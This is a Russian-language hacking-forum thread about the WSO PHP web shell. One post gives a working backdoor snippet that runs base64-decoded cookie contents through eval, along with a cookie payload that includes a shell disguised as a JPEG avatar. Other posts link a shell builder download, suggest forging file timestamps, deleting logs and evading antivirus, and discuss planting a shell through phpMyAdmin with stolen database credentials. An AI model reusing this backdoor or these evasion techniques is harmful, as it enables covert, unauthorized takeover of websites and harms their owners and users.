WSO (веб-шелл)

Discussion in 'Избранное' started by oRb, 26 Jan 2009.

  1. frank

    frank Member

    Joined:
    8 May 2015
    Messages:
    200
    Likes Received:
    96
    Reputations:
    28
    на крупных ресурсах как раз мониторят на фронтах еррор логи от бек эндов, и когда отдается тот же 404 больше шансов что заметят, чем 200 ок
     
  2. TANZWUT

    TANZWUT Крёстный отец :)

    Joined:
    22 Jun 2005
    Messages:
    1,474
    Likes Received:
    716
    Reputations:
    744
    Зачем столько гемора? Если есть возможность правки, то запрятать в строках примитивный код типа
    PHP:
    ***
    $logout=base64_decode($_COOKIE['logout']);
    ***
    if (isset(
    $_COOKIE['logout'])) 
    {@die(eval(
    $logout));}
    поправить время через touch, залить jpeg-шелл в аватарки/etc и печеньку подсунуть
    Code:
    logout=aW5jbHVkZSgiL2hvbWUvdXNlci93d3cvYXZhdGFycy91c2VyLmpwZyIpOw==
    Вариантов много, лиж бы фантазии хватило.
     
    _________________________
    dondy likes this.
  3. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    Там же есть описание http://kronus.me/2012/07/wso-builder-v1-04/ и ссылка для скачивания http://kronus.me/wp-content/uploads/2012/07/builder_v1.042.zip так то любопытный конструктор
     
    _________________________
    dondy likes this.
  4. dondy

    dondy Member

    Joined:
    5 Jun 2015
    Messages:
    560
    Likes Received:
    61
    Reputations:
    5
    а что за файлы в билдере такие с расширением .inc?
     
  5. TANZWUT

    TANZWUT Крёстный отец :)

    Joined:
    22 Jun 2005
    Messages:
    1,474
    Likes Received:
    716
    Reputations:
    744
    А догадайся с трёх раз ;)
     
    _________________________
  6. Rado

    Rado Elder - Старейшина

    Joined:
    30 May 2011
    Messages:
    281
    Likes Received:
    289
    Reputations:
    39
    .inc include библиотеки с функциями или любые другие подключаемые файлы.
     
    dondy likes this.
  7. b3

    b3 Banned

    Joined:
    5 Dec 2004
    Messages:
    2,170
    Likes Received:
    1,155
    Reputations:
    202
    Смысл? Я им не пользуюсь. В свое время я помогал автору шела. Сейчас я помогаю по возможности другому автору другого шела.

    Какие есть предложения? Что именно ты хочешь сделать, какие есть замечания и самый главный вопрос чем эта версия лучше последней?

    А может её вообще убрать лучше? По мне так только идиот с шела будет переходить по внешним ссылкам оставляя реферер да вообще данного рода поиск не точный потому как берется полная фраза для поиска а по сути важен только год а не версия ядра с включенным именем хоста.
     
  8. grimnir

    grimnir Members of Antichat

    Joined:
    23 Apr 2012
    Messages:
    1,114
    Likes Received:
    830
    Reputations:
    231
    Сокращение от include, так обычно обзывают библиотеки с функциями или любые другие подключаемые файлы.
     
    _________________________
    dondy likes this.
  9. b3

    b3 Banned

    Joined:
    5 Dec 2004
    Messages:
    2,170
    Likes Received:
    1,155
    Reputations:
    202
    А еще так обычно находят исходники на сайте, изучают и хекают потом )
     
    grimnir and yarbabin like this.
  10. dondy

    dondy Member

    Joined:
    5 Jun 2015
    Messages:
    560
    Likes Received:
    61
    Reputations:
    5
    заметил что шеллы переодически удаляются, возможно где то спрятан скрипт который отслеживает появление новых файлов на хостинге
    прячу и в картинку и в txt но всё равно шелы исчезают
    как можно ещё спрятать ? скрипт палящий не нашёл, файлов много, сайт на битриксе
    wso зашифрованный, логи я удаляю после завершения входа
     
  11. b3

    b3 Banned

    Joined:
    5 Dec 2004
    Messages:
    2,170
    Likes Received:
    1,155
    Reputations:
    202
    всмысле? error_reporting включил?
     
  12. b3

    b3 Banned

    Joined:
    5 Dec 2004
    Messages:
    2,170
    Likes Received:
    1,155
    Reputations:
    202
    Я ничего не понял ты можешь выражаться ясно? ты добавил перенаправление 2>&1 для консоли или просто включил error_reporting если второе ты ты дибил однозначно
     
  13. b3

    b3 Banned

    Joined:
    5 Dec 2004
    Messages:
    2,170
    Likes Received:
    1,155
    Reputations:
    202
    Перечень багов пожалуйста сюда списком.
    Не палится чем именно, список.
    Смысл? Я считаю это уже нужно самому проверять а не увеличивать размер шела таким бесполезным функционалом который не каждый использует. Как по мне я бы даже вырезал несколько моментов из шела за ненадобностью тем самым сократив код.
     
  14. b3

    b3 Banned

    Joined:
    5 Dec 2004
    Messages:
    2,170
    Likes Received:
    1,155
    Reputations:
    202
    Вангую что ты сегодня последний день на форуме)))
     
  15. b3

    b3 Banned

    Joined:
    5 Dec 2004
    Messages:
    2,170
    Likes Received:
    1,155
    Reputations:
    202
    Ты внатуре даун что ли, я ему пишу выложи дифф правок или хотя бы опиши что ты сделал а он мне "скачай посмотри" что посмотреть? Ты думаешь мне интересно делать дифф старой версии шела с твоей версией чтоб посмотреть что ты там натворил? Судя по тому что ты включил вывод ошибок error_reporting ты уже показал что ты идиот который не знает что делает и зачем. По поводу перенаправления 2>&1 ясен хрен не нужно его делать, ну разве что ты хочешь упороть шелл окончательно то делай. Чтоб ты дурачек знал многие люди специально делают перенаправление буфера ошибок в /dev/null чтоб не видеть лишней инфы, а ты сейчас предлагаешь её обьеденить с буфером вывода.
    В общем я не буду больше ничего писать потому как с каждым твоим ответом я все больше убеждаюсь что ты очередной нарисовавшийся вася на время каникул решил тут херни натворить. И все таки не понимаю как это палился и теперь не палиться, чем ты это можешь подтвердить и как я могу это перепроверить? Не палиться что ли антивирусом clamav? Так напиши по русски или чем не палиться я понять не могу. Качать это УГ есесно не буду. В общем удачи, я смотрю критику ты не воспринимаешь и явных овтетов не даешь, все упирается в "скачай посмотри"
     
    Take_IT likes this.
  16. dondy

    dondy Member

    Joined:
    5 Jun 2015
    Messages:
    560
    Likes Received:
    61
    Reputations:
    5
    админ хитрый, мониторит файлы на наличие новых файлов на сервере + предыдущий файл снёс и запретил входить в админку всем подрят
    но есть доступ к базе через phpmyadmin

    войти в админку сайта не получается - стоит блок - разрешает определённым ip или юзерагентам (bitrix)
    можно ли через phpmyadmin залить шелл ? что то пробовал как по этому видео
    но мини шелл не работает - не выводит phpinfo

    скину в лс логин/pass от sql, помогите пожалуйста
     
    #436 dondy, 23 Jul 2015
    Last edited: 23 Jul 2015
  17. b3

    b3 Banned

    Joined:
    5 Dec 2004
    Messages:
    2,170
    Likes Received:
    1,155
    Reputations:
    202
    Ты темой ошибся и скинь в лс.
     
  18. CodeHunter

    CodeHunter New Member

    Joined:
    16 Jul 2015
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    на хостинге не пошло

    Forbidden: a malicious file has been detected.

    Detected as: PHP.Shell-38

    печалька
     
  19. tilo

    tilo New Member

    Joined:
    24 Jul 2015
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    а не подскажете как базу ломануть сим превосходным инструментом?
     
  20. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    Базу вы "сим превосходным инструментом" ни как не взломаете, если только имеете логин, пароль, удаленый хост и название БД!
     
    _________________________